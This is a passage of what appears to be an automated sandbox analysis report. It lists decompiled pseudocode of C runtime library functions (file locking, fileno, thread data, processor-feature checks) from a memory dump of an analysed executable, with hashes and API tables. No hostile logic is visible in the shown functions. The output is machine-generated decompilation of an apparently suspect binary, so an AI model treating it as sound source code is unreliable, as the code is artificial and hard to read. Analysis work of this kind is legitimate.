				E0040E1D8(__ebx, __edi, __esi);
				_t28 = E00410735(__ebx, __edx, __edi, _t30);
				_t13 =  *0x422e34; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E0040D6E0(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x422f18; // 0x422e40
					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E004147A2();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E0040E79A(_t25, _t26, 0x20);
				}
				return E0040E21D(_t28);
			}







                                                                                                                                                  0x00414738
                                                                                                                                                  0x00414738
                                                                                                                                                  0x00414738
                                                                                                                                                  0x00414738
                                                                                                                                                  0x00414738
                                                                                                                                                  0x0041473a
                                                                                                                                                  0x0041473f
                                                                                                                                                  0x00414749
                                                                                                                                                  0x0041474b
                                                                                                                                                  0x00414753
                                                                                                                                                  0x00414777
                                                                                                                                                  0x00414779
                                                                                                                                                  0x0041477f
                                                                                                                                                  0x00414783
                                                                                                                                                  0x00414786
                                                                                                                                                  0x00414791
                                                                                                                                                  0x00414794
                                                                                                                                                  0x0041479b
                                                                                                                                                  0x00414755
                                                                                                                                                  0x00414755
                                                                                                                                                  0x00414759
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041475b
                                                                                                                                                  0x00414760
                                                                                                                                                  0x00414760
                                                                                                                                                  0x00414759
                                                                                                                                                  0x00414765
                                                                                                                                                  0x00414769
                                                                                                                                                  0x0041476e
                                                                                                                                                  0x00414776

                                                                                                                                                  APIs
                                                                                                                                                  • __getptd.LIBCMT ref: 00414744
                                                                                                                                                    • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                    • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                  • __getptd.LIBCMT ref: 0041475B
                                                                                                                                                  • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                                  • __lock.LIBCMT ref: 00414779
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.927137861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.927223264.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.927239148.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                  • String ID: @.B
                                                                                                                                                  • API String ID: 3521780317-470711618
                                                                                                                                                  • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                  • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                                  • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                  • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0040C73D, Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                  			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t21;
				signed int _t22;
				intOrPtr* _t27;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t50;

				_t37 = __edx;
				_push(8);
				_push(0x421140);
				E0040E1D8(__ebx, __edi, __esi);
				_t39 = _a4;
				_t50 = _t39;
				_t51 = _t50 != 0;
				if(_t50 != 0) {
					E0040FB29(_t39);
					_v8 = 0;
					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
					_t16 = E0040FA20(__edx, _t39, _t39);
					__eflags = _t16 - 0xffffffff;
					if(_t16 == 0xffffffff) {
						L6:
						_t17 = 0x4227e0;
					} else {
						_t21 = E0040FA20(__edx, _t39, _t39);
						__eflags = _t21 - 0xfffffffe;
						if(_t21 == 0xfffffffe) {
							goto L6;
						} else {
							_t22 = E0040FA20(__edx, _t39, _t39);
							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
						}
					}
					_t9 = _t17 + 4; // 0xa80
					 *(_t17 + 4) =  *_t9 & 0x000000fd;
					_v8 = 0xfffffffe;
					E0040C735(_t39);
					_t19 = 0;
					__eflags = 0;
				} else {
					_t27 = E0040BFC1(_t51);
					_t40 = 0x16;
					 *_t27 = _t40;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0040E744(__edx, _t40, 0);
					_t19 = _t40;
				}
				return E0040E21D(_t19);
			}













                                                                                                                                                  0x0040c73d
                                                                                                                                                  0x0040c690
                                                                                                                                                  0x0040c692
                                                                                                                                                  0x0040c697
                                                                                                                                                  0x0040c69e
                                                                                                                                                  0x0040c6a3
                                                                                                                                                  0x0040c6a8
                                                                                                                                                  0x0040c6aa
                                                                                                                                                  0x0040c6c8
                                                                                                                                                  0x0040c6ce
                                                                                                                                                  0x0040c6d1
                                                                                                                                                  0x0040c6d6
                                                                                                                                                  0x0040c6dc
                                                                                                                                                  0x0040c6df
                                                                                                                                                  0x0040c70f
                                                                                                                                                  0x0040c70f
                                                                                                                                                  0x0040c6e1
                                                                                                                                                  0x0040c6e2
                                                                                                                                                  0x0040c6e8
                                                                                                                                                  0x0040c6eb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c6ed
                                                                                                                                                  0x0040c6ee
                                                                                                                                                  0x0040c70b
                                                                                                                                                  0x0040c70b
                                                                                                                                                  0x0040c6eb
                                                                                                                                                  0x0040c714
                                                                                                                                                  0x0040c71b
                                                                                                                                                  0x0040c71e
                                                                                                                                                  0x0040c725
                                                                                                                                                  0x0040c72a
                                                                                                                                                  0x0040c72a
                                                                                                                                                  0x0040c6ac
                                                                                                                                                  0x0040c6ac
                                                                                                                                                  0x0040c6b3
                                                                                                                                                  0x0040c6b4
                                                                                                                                                  0x0040c6b6
                                                                                                                                                  0x0040c6b7
                                                                                                                                                  0x0040c6b8
                                                                                                                                                  0x0040c6b9
                                                                                                                                                  0x0040c6ba
                                                                                                                                                  0x0040c6bb
                                                                                                                                                  0x0040c6c3
                                                                                                                                                  0x0040c6c3
                                                                                                                                                  0x0040c731

                                                                                                                                                  APIs
                                                                                                                                                  • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                                  • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                                  • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                                  • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                                  • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                                    • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                    • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.927137861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.927223264.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.927239148.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2805327698-0
                                                                                                                                                  • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                  • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                                  • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                  • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00413FCC, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                  			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x421490);
				E0040E1D8(__ebx, __edi, __esi);
				_t31 = E00410735(__ebx, __edx, __edi, _t35);
				_t15 =  *0x422e34; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040D6E0(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x422d38; // 0x1ff1660
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x422910;
								if(__eflags != 0) {
									_push(_t33);
									E0040B6B5(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x422d38; // 0x1ff1660
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x422d38; // 0x1ff1660
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00414067();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040E79A(_t29, _t31, 0x20);
				}
				return E0040E21D(_t33);
			}










                                                                                                                                                  0x00413fcc
                                                                                                                                                  0x00413fcc
                                                                                                                                                  0x00413fcc
                                                                                                                                                  0x00413fcc
                                                                                                                                                  0x00413fce
                                                                                                                                                  0x00413fd3
                                                                                                                                                  0x00413fdd
                                                                                                                                                  0x00413fdf
                                                                                                                                                  0x00413fe7
                                                                                                                                                  0x00414008
                                                                                                                                                  0x0041400e
                                                                                                                                                  0x00414012
                                                                                                                                                  0x00414015
                                                                                                                                                  0x00414018
                                                                                                                                                  0x0041401e
                                                                                                                                                  0x00414020
                                                                                                                                                  0x00414022
                                                                                                                                                  0x00414025
                                                                                                                                                  0x0041402b
                                                                                                                                                  0x0041402d
                                                                                                                                                  0x0041402f
                                                                                                                                                  0x00414035
                                                                                                                                                  0x00414037
                                                                                                                                                  0x00414038
                                                                                                                                                  0x0041403d
                                                                                                                                                  0x00414035
                                                                                                                                                  0x0041402d
                                                                                                                                                  0x0041403e
                                                                                                                                                  0x00414043
                                                                                                                                                  0x00414046
                                                                                                                                                  0x0041404c
                                                                                                                                                  0x00414050
                                                                                                                                                  0x00414050
                                                                                                                                                  0x00414056
                                                                                                                                                  0x0041405d
                                                                                                                                                  0x00413fef
                                                                                                                                                  0x00413fef
                                                                                                                                                  0x00413fef
                                                                                                                                                  0x00413ff4
                                                                                                                                                  0x00413ff8
                                                                                                                                                  0x00413ffd
                                                                                                                                                  0x00414005

                                                                                                                                                  APIs
                                                                                                                                                  • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                                    • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                    • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                  • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                                  • __lock.LIBCMT ref: 00414008
                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                                  • InterlockedIncrement.KERNEL32(01FF1660), ref: 00414050
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.927137861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.927223264.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.927239148.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4271482742-0
                                                                                                                                                  • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                  • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                                  • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                  • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00413610, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 65%
                                                                                                                                                  			E00413610() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x41fb50;
					_v28 =  *0x41fb48;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                                                                                                                                                  0x00413615
                                                                                                                                                  0x0041361d
                                                                                                                                                  0x00413634
                                                                                                                                                  0x004135e0
                                                                                                                                                  0x004135e9
                                                                                                                                                  0x004135f5
                                                                                                                                                  0x004135f8
                                                                                                                                                  0x004135fb
                                                                                                                                                  0x004135fd
                                                                                                                                                  0x00413600
                                                                                                                                                  0x00413605
                                                                                                                                                  0x0041360f
                                                                                                                                                  0x00413607
                                                                                                                                                  0x0041360b
                                                                                                                                                  0x0041360b
                                                                                                                                                  0x0041361f
                                                                                                                                                  0x00413625
                                                                                                                                                  0x0041362d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041362f
                                                                                                                                                  0x0041362f
                                                                                                                                                  0x00413633
                                                                                                                                                  0x00413633
                                                                                                                                                  0x0041362d

                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.927137861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.927223264.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.927239148.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                  • API String ID: 1646373207-3105848591
                                                                                                                                                  • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                  • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                                  • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                  • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0040C748, Relevance: 6.1, APIs: 4, Instructions: 148COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                  			E0040C748(void* __edx, void* __esi, char _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				intOrPtr _t73;
				signed int _t75;
				signed int _t81;
				char _t82;
				signed int _t84;
				intOrPtr* _t86;
				signed int _t87;
				intOrPtr* _t90;
				signed int _t92;
				signed int _t94;
				void* _t96;
				signed char _t98;
				signed int _t99;
				intOrPtr _t102;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t111;
				signed int _t114;
				intOrPtr _t115;

				_t105 = __esi;
				_t97 = __edx;
				_t104 = _a4;
				_t87 = 0;
				_t121 = _t104;
				if(_t104 != 0) {
					_t70 = E0040FA20(__edx, _t104, _t104);
					__eflags =  *(_t104 + 4);
					_v8 = _t70;
					if(__eflags < 0) {
						 *(_t104 + 4) = 0;
					}
					_push(1);
					_push(_t87);
					_push(_t70);
					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
					__eflags = _t71 - _t87;
					_v12 = _t71;
					if(_t71 < _t87) {
						L2:
						return _t71 | 0xffffffff;
					} else {
						_t98 =  *(_t104 + 0xc);
						__eflags = _t98 & 0x00000108;
						if((_t98 & 0x00000108) != 0) {
							_t73 =  *_t104;
							_t92 =  *(_t104 + 8);
							_push(_t105);
							_v16 = _t73 - _t92;
							__eflags = _t98 & 0x00000003;
							if((_t98 & 0x00000003) == 0) {
								__eflags = _t98;
								if(__eflags < 0) {
									L15:
									__eflags = _v12 - _t87;
									if(_v12 != _t87) {
										__eflags =  *(_t104 + 0xc) & 0x00000001;
										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
											L40:
											_t75 = _v16 + _v12;
											__eflags = _t75;
											L41:
											return _t75;
										}
										_t99 =  *(_t104 + 4);
										__eflags = _t99 - _t87;
										if(_t99 != _t87) {
											_t90 = 0x423f60 + (_v8 >> 5) * 4;
											_a4 = _t73 - _t92 + _t99;
											_t111 = (_v8 & 0x0000001f) << 6;
											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
											if(__eflags == 0) {
												L39:
												_t66 =  &_v12;
												 *_t66 = _v12 - _a4;
												__eflags =  *_t66;
												goto L40;
											}
											_push(2);
											_push(0);
											_push(_v8);
											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
											if(__eflags != 0) {
												_push(0);
												_push(_v12);
												_push(_v8);
												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
												__eflags = _t81;
												if(_t81 >= 0) {
													_t82 = 0x200;
													__eflags = _a4 - 0x200;
													if(_a4 > 0x200) {
														L35:
														_t82 =  *((intOrPtr*)(_t104 + 0x18));
														L36:
														_a4 = _t82;
														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
														L37:
														if(__eflags != 0) {
															_t63 =  &_a4;
															 *_t63 = _a4 + 1;
															__eflags =  *_t63;
														}
														goto L39;
													}
													_t94 =  *(_t104 + 0xc);
													__eflags = _t94 & 0x00000008;
													if((_t94 & 0x00000008) == 0) {
														goto L35;
													}
													__eflags = _t94 & 0x00000400;
													if((_t94 & 0x00000400) == 0) {
														goto L36;
													}
													goto L35;
												}
												L31:
												_t75 = _t81 | 0xffffffff;
												goto L41;
											}
											_t84 =  *(_t104 + 8);
											_t96 = _a4 + _t84;
											while(1) {
												__eflags = _t84 - _t96;
												if(_t84 >= _t96) {
													break;
												}
												__eflags =  *_t84 - 0xa;
												if( *_t84 == 0xa) {
													_t44 =  &_a4;
													 *_t44 = _a4 + 1;
													__eflags =  *_t44;
												}
												_t84 = _t84 + 1;
												__eflags = _t84;
											}
											__eflags =  *(_t104 + 0xc) & 0x00002000;
											goto L37;
										}
										_v16 = _t87;
										goto L40;
									}
									_t75 = _v16;
									goto L41;
								}
								_t81 = E0040BFC1(__eflags);
								 *_t81 = 0x16;
								goto L31;
							}
							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
							_t114 = (_v8 & 0x0000001f) << 6;
							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
								goto L15;
							}
							_t103 = _t92;
							__eflags = _t103 - _t73;
							if(_t103 >= _t73) {
								goto L15;
							}
							_t115 = _t73;
							do {
								__eflags =  *_t103 - 0xa;
								if( *_t103 == 0xa) {
									_v16 = _v16 + 1;
									_t87 = 0;
									__eflags = 0;
								}
								_t103 = _t103 + 1;
								__eflags = _t103 - _t115;
							} while (_t103 < _t115);
							goto L15;
						}
						return _t71 -  *(_t104 + 4);
					}
				}
				_t86 = E0040BFC1(_t121);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				 *_t86 = 0x16;
				_t71 = E0040E744(__edx, _t104, __esi);
				goto L2;
			}






























                                                                                                                                                  0x0040c748
                                                                                                                                                  0x0040c748
                                                                                                                                                  0x0040c752
                                                                                                                                                  0x0040c755
                                                                                                                                                  0x0040c757
                                                                                                                                                  0x0040c759
                                                                                                                                                  0x0040c77c
                                                                                                                                                  0x0040c781
                                                                                                                                                  0x0040c785
                                                                                                                                                  0x0040c788
                                                                                                                                                  0x0040c78a
                                                                                                                                                  0x0040c78a
                                                                                                                                                  0x0040c78d
                                                                                                                                                  0x0040c78f
                                                                                                                                                  0x0040c790
                                                                                                                                                  0x0040c791
                                                                                                                                                  0x0040c799
                                                                                                                                                  0x0040c79b
                                                                                                                                                  0x0040c79e
                                                                                                                                                  0x0040c773
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c7a0
                                                                                                                                                  0x0040c7a0
                                                                                                                                                  0x0040c7a3
                                                                                                                                                  0x0040c7a9
                                                                                                                                                  0x0040c7b3
                                                                                                                                                  0x0040c7b5
                                                                                                                                                  0x0040c7b8
                                                                                                                                                  0x0040c7bd
                                                                                                                                                  0x0040c7c0
                                                                                                                                                  0x0040c7c3
                                                                                                                                                  0x0040c806
                                                                                                                                                  0x0040c808
                                                                                                                                                  0x0040c7f9
                                                                                                                                                  0x0040c7f9
                                                                                                                                                  0x0040c7fc
                                                                                                                                                  0x0040c81a
                                                                                                                                                  0x0040c81e
                                                                                                                                                  0x0040c8d8
                                                                                                                                                  0x0040c8de
                                                                                                                                                  0x0040c8de
                                                                                                                                                  0x0040c8e0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c8e0
                                                                                                                                                  0x0040c824
                                                                                                                                                  0x0040c827
                                                                                                                                                  0x0040c829
                                                                                                                                                  0x0040c843
                                                                                                                                                  0x0040c84a
                                                                                                                                                  0x0040c84f
                                                                                                                                                  0x0040c852
                                                                                                                                                  0x0040c857
                                                                                                                                                  0x0040c8d2
                                                                                                                                                  0x0040c8d5
                                                                                                                                                  0x0040c8d5
                                                                                                                                                  0x0040c8d5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c8d5
                                                                                                                                                  0x0040c859
                                                                                                                                                  0x0040c85b
                                                                                                                                                  0x0040c85d
                                                                                                                                                  0x0040c868
                                                                                                                                                  0x0040c86b
                                                                                                                                                  0x0040c88d
                                                                                                                                                  0x0040c88f
                                                                                                                                                  0x0040c892
                                                                                                                                                  0x0040c895
                                                                                                                                                  0x0040c89d
                                                                                                                                                  0x0040c89f
                                                                                                                                                  0x0040c8a6
                                                                                                                                                  0x0040c8ab
                                                                                                                                                  0x0040c8ae
                                                                                                                                                  0x0040c8c0
                                                                                                                                                  0x0040c8c0
                                                                                                                                                  0x0040c8c3
                                                                                                                                                  0x0040c8c3
                                                                                                                                                  0x0040c8c8
                                                                                                                                                  0x0040c8cd
                                                                                                                                                  0x0040c8cd
                                                                                                                                                  0x0040c8cf
                                                                                                                                                  0x0040c8cf
                                                                                                                                                  0x0040c8cf
                                                                                                                                                  0x0040c8cf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c8cd
                                                                                                                                                  0x0040c8b0
                                                                                                                                                  0x0040c8b3
                                                                                                                                                  0x0040c8b6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c8b8
                                                                                                                                                  0x0040c8be
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c8be
                                                                                                                                                  0x0040c8a1
                                                                                                                                                  0x0040c8a1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c8a1
                                                                                                                                                  0x0040c86d
                                                                                                                                                  0x0040c873
                                                                                                                                                  0x0040c880
                                                                                                                                                  0x0040c880
                                                                                                                                                  0x0040c882
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c877
                                                                                                                                                  0x0040c87a
                                                                                                                                                  0x0040c87c
                                                                                                                                                  0x0040c87c
                                                                                                                                                  0x0040c87c
                                                                                                                                                  0x0040c87c
                                                                                                                                                  0x0040c87f
                                                                                                                                                  0x0040c87f
                                                                                                                                                  0x0040c87f
                                                                                                                                                  0x0040c884
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c884
                                                                                                                                                  0x0040c82b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c82b
                                                                                                                                                  0x0040c7fe
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c7fe
                                                                                                                                                  0x0040c80a
                                                                                                                                                  0x0040c80f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c80f
                                                                                                                                                  0x0040c7ce
                                                                                                                                                  0x0040c7d8
                                                                                                                                                  0x0040c7db
                                                                                                                                                  0x0040c7e0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c7e2
                                                                                                                                                  0x0040c7e4
                                                                                                                                                  0x0040c7e6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c7e8
                                                                                                                                                  0x0040c7ea
                                                                                                                                                  0x0040c7ea
                                                                                                                                                  0x0040c7ed
                                                                                                                                                  0x0040c7ef
                                                                                                                                                  0x0040c7f2
                                                                                                                                                  0x0040c7f2
                                                                                                                                                  0x0040c7f2
                                                                                                                                                  0x0040c7f4
                                                                                                                                                  0x0040c7f5
                                                                                                                                                  0x0040c7f5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c7ea
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c7ab
                                                                                                                                                  0x0040c79e
                                                                                                                                                  0x0040c75b
                                                                                                                                                  0x0040c760
                                                                                                                                                  0x0040c761
                                                                                                                                                  0x0040c762
                                                                                                                                                  0x0040c763
                                                                                                                                                  0x0040c764
                                                                                                                                                  0x0040c765
                                                                                                                                                  0x0040c76b
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                                  • __locking.LIBCMT ref: 0040C791
                                                                                                                                                    • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                    • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.927137861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.927223264.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.927239148.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2395185920-0
                                                                                                                                                  • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                  • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                                  • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                  • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00405D00, Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                                  			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t35;
				signed int _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t45;
				signed int _t48;
				signed int* _t53;
				void* _t54;
				void* _t55;
				void* _t57;

